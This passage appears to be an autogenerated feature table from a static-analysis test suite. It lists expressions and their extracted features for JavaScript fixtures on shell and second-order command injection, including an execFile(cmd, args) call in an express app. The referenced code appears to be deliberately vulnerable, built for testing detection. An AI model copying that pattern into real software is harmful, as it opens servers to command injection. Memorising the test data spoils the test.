autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:3:50:21 | execFile(cmd, args) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:12:50:14 | cmd | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | contextSurroundingFunctionParameters | (cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | enclosingFunctionBody | cmd args execFile cmd args | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | enclosingFunctionName | indirect | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:50:17:50:20 | args | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:3 | app | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:3 | app | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:10 | app.listen | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:10 | app.listen | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:10 | app.listen | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | app.lis ... 000!")) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | app.lis ... 000!")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | app.lis ... 000!")) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | exceptional return of app.lis ... 000!")) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | exceptional return of app.lis ... 000!")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:1:53:74 | exceptional return of app.lis ... 000!")) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:5:53:10 | listen | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:5:53:10 | listen | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:5:53:10 | listen | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | CalleeFlexibleAccessPath | app.listen | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:12:53:15 | 3000 | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | 'arguments' object of anonymous function | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | 'arguments' object of anonymous function | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | 'arguments' object of anonymous function | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | 'arguments' object of anonymous function | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | CalleeFlexibleAccessPath | app.listen | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | calleeImports | express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | () => c ... 3000!") | receiverName | app | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | exceptional return of anonymous function | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | exceptional return of anonymous function | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | exceptional return of anonymous function | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | exceptional return of anonymous function | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | return of anonymous function | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | return of anonymous function | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | return of anonymous function | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:18:53:73 | return of anonymous function | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:30 | console | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:30 | console | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:30 | console | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:30 | console | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:30 | console | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:34 | console.log | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:34 | console.log | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:34 | console.log | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:34 | console.log | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:34 | console.log | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | console ... 3000!") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | exceptional return of console ... 3000!") | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | exceptional return of console ... 3000!") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | exceptional return of console ... 3000!") | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | exceptional return of console ... 3000!") | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:24:53:73 | exceptional return of console ... 3000!") | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:32:53:34 | log | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:32:53:34 | log | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:32:53:34 | log | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:32:53:34 | log | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:32:53:34 | log | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | enclosingFunctionBody | console log Example app listening on port 3000! | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | enclosingFunctionName | app.listen#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:53:36:53:72 | "Exampl ... 3000!" | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:0 | __dirname | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:0 | this | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | __dirname | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | cp | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | execa | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:1:1:1 | require | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:6 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:6 | cp | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:33 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:33 | cp | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:33 | cp = re ... ocess') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:33 | cp = re ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:5:1:33 | cp = re ... ocess') | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:16 | require | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | exceptional return of require ... ocess') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | exceptional return of require ... ocess') | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | require ... ocess') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:10:1:33 | require ... ocess') | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:18:1:32 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:18:1:32 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:18:1:32 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:18:1:32 | 'child_process' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:18:1:32 | 'child_process' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:1:18:1:32 | 'child_process' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:8 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:8 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:8 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:8 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:26 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:26 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:26 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:26 | path = ... 'path') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:26 | path = ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:5:2:26 | path = ... 'path') | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:18 | require | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | exceptional return of require('path') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | exceptional return of require('path') | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | require('path') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | require('path') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:12:2:26 | require('path') | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:20:2:25 | 'path' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:20:2:25 | 'path' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:20:2:25 | 'path' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:20:2:25 | 'path' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:20:2:25 | 'path' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:2:20:2:25 | 'path' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:9 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:9 | execa | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:9 | execa | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:9 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:28 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:28 | execa | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:28 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:28 | execa = ... execa") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:28 | execa = ... execa") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:5:3:28 | execa = ... execa") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:19 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:19 | require | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:3:13:3:28 | exceptional return of require("execa") | contextFunctionInterfaces | | +| 